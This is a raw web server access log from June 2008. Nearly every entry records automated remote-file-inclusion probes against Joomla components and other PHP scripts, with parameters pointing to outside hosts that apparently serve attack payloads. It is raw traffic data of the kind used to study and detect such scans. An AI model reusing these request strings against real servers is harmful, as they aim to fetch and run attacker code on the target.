77.232.68.10 - - [09/Jun/2008:09:00:01 -0700] "GET /logs/access_071221.log/protection.php?action=logout&siteurl=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.10 - - [09/Jun/2008:09:00:02 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.10 - - [09/Jun/2008:09:00:06 -0700] "GET /logs/access_080116.log/protection.php?action=logout&siteurl=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [09/Jun/2008:09:00:08 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:00:33 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:00:33 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:00:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [09/Jun/2008:09:00:40 -0700] "GET /logs/access_080429.log//includes/messages.inc.php?include_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [09/Jun/2008:09:00:40 -0700] "GET //includes/messages.inc.php?include_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [09/Jun/2008:09:00:40 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:09:00:41 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:09:00:51 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:01:07 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:01:07 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:01:07 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:01:19 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:01:19 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:01:19 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:01:26 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:01:33 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:01:33 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:01:45 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:01:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:09:01:59 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:02:00 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0034.jpg HTTP/1.1" 200 278838 "-" "Googlebot-Image/1.0" "dmulk.com"
67.19.216.122 - - [09/Jun/2008:09:02:04 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 16929 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:09:02:04 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:02:07 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:02:07 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:15 -0700] "GET /logs/access_080106.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:16 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:17 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:02:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:09:02:27 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:09:02:28 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 16929 "-" "libwww-perl/5.811" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:02:30 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:02:32 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:02:32 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:02:33 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:34 -0700] "GET /logs/access_080106.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:02:34 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:02:34 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:34 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.85.12 - - [09/Jun/2008:09:02:35 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://h1.ripway.com/the0nlyhills/ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:35 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:09:02:38 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [09/Jun/2008:09:02:38 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:02:40 -0700] "GET /logs/access_080108.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:41 -0700] "GET /logs/access_080106.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:42 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:02:42 -0700] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:09:02:50 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.239.89.26 - - [09/Jun/2008:09:02:50 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:09:02:56 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0020.jpg HTTP/1.1" 200 10722 "-" "Googlebot-Image/1.0" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:03:00 -0700] "GET /logs/access_080507.log/home.php?x=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.59.63 - - [09/Jun/2008:09:03:01 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.cd-virgin.com/down/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.59.63 - - [09/Jun/2008:09:03:02 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.cd-virgin.com/down/rox.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:09:03:14 -0700] "GET /logs/access_071224.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:03:15 -0700] "GET /logs/access_080216.log/main.php?x=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:03:15 -0700] "GET /main.php?x=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:09:03:15 -0700] "GET /logs/main.php?x=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:09:03:16 -0700] "GET /logs//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:09:03:16 -0700] "GET //catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:03:35 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:03:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:03:39 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.87.84 - - [09/Jun/2008:09:03:39 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:03:40 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [09/Jun/2008:09:03:46 -0700] "GET /logs//catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [09/Jun/2008:09:03:46 -0700] "GET //catalog/includes/include_once.php?include_file=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:03:49 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
130.242.82.146 - - [09/Jun/2008:09:03:50 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bjork.name.md/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.15.36.156 - - [09/Jun/2008:09:03:53 -0700] "GET /logs/index.php?option=com_joomap&Itemid=30&lang=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
81.15.36.156 - - [09/Jun/2008:09:03:55 -0700] "GET /index.php?option=com_joomap&Itemid=30&lang=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 200 16929 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
75.63.85.187 - - [09/Jun/2008:09:04:14 -0700] "GET /logs/access_080429.log/phpAdsNew/view.inc.php?phpAds_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [09/Jun/2008:09:04:14 -0700] "GET /phpAdsNew/view.inc.php?phpAds_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.63.85.187 - - [09/Jun/2008:09:04:15 -0700] "GET /logs/phpAdsNew/view.inc.php?phpAds_path=http://www.bk2k.com/img/g2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.180 - - [09/Jun/2008:09:04:20 -0700] "GET /logs/access.log HTTP/1.0" 200 16557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:09:05:07 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.171.91.82 - - [09/Jun/2008:09:05:08 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/lowryder08/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [09/Jun/2008:09:05:19 -0700] "GET /logs/access_080429.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.25.5.89 - - [09/Jun/2008:09:05:41 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.25.5.89 - - [09/Jun/2008:09:05:41 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.25.5.89 - - [09/Jun/2008:09:05:41 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:05:42 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:05:46 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:05:48 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [09/Jun/2008:09:05:51 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://nmbsquad.freehostia.com//b1.txt??? HTTP/1.1" 200 16945 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:09:05:59 -0700] "GET /logs/access_080310.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:03 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:03 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:04 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:04 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:04 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:04 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:08 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:08 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:08 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:08 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:09 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:09 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:09 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:09 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:09 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.12.3 - - [09/Jun/2008:09:06:11 -0700] "GET /logs/access_080204.log//components/com_joomlaboard/file_upload.php?sbp=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:15 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:15 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:06:15 -0700] "GET /logs//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.215.151 - - [09/Jun/2008:09:06:18 -0700] "GET ///includes/get_header.php?vwar_root=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
160.99.12.231 - - [09/Jun/2008:09:06:51 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [09/Jun/2008:09:06:51 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [09/Jun/2008:09:06:52 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:09:06:57 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [09/Jun/2008:09:07:04 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.114.130.19 - - [09/Jun/2008:09:07:05 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:07:21 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:07:21 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:07:21 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:21 -0700] "GET /logs/access_080117.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.55.80.182 - - [09/Jun/2008:09:07:21 -0700] "GET //db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [09/Jun/2008:09:07:22 -0700] "GET /logs/access_080106.log//db/txt.inc.php?file=[file]&check=0&comment=http://learn-more-today.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
